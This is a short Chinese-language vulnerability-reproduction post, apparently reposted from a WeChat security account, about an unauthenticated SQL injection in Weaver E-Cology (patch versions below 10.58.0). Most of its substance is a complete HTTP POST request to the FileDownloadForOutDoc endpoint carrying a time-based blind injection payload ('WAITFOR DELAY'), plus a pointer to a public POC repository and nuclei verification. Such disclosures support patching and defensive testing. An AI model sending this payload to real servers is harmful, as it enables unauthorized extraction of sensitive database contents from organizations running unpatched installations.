【漏洞复现】FW E-Cology-SQL (POC)

admin 2023年7月13日14:05:42评论26 views字数 1057阅读3分31秒阅读模式
免责声明
【漏洞复现】FW E-Cology-SQL (POC)
本公众号所提供的文字和信息仅供学习和研究使用,请读者自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。

 

漏洞简述

泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台,形成了一系列的通用解决方案和行业解决方案。
近日,泛微官方发布的10.58.0补丁版本存在一个SQL注入漏洞,未经授权的远程攻击者可通过发送特殊的HTTP请求来利用此漏洞,最终可导致攻击者获取数据库敏感信息。

漏洞影响
Ecology 9.x 补丁版本 < 10.58.0Ecology 8.x 补丁版本 < 10.58.0

 

漏洞复现

 

登陆页面如下:

【漏洞复现】FW E-Cology-SQL (POC)

POST //weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1Host: xxxxxCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9If-None-Match: "AyurgkJJwkD"If-Modified-Since: Sat, 15 Oct 2022 01:55:58 GMTConnection: closeContent-Length: 45fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1

发送payload,可发现 Delay 时间

【漏洞复现】FW E-Cology-SQL (POC)

nuclei 插件验证漏洞存在

【漏洞复现】FW E-Cology-SQL (POC)

获取 POC
  • https://github.com/izzz0/E-Cology9.0-SQL-POC

 

 

 

原文始发于微信公众号(贝雷帽SEC):【漏洞复现】FW E-Cology-SQL (POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月13日14:05:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】FW E-Cology-SQL (POC)http://cn-sec.com/archives/1871934.html

发表评论

匿名网友 填写信息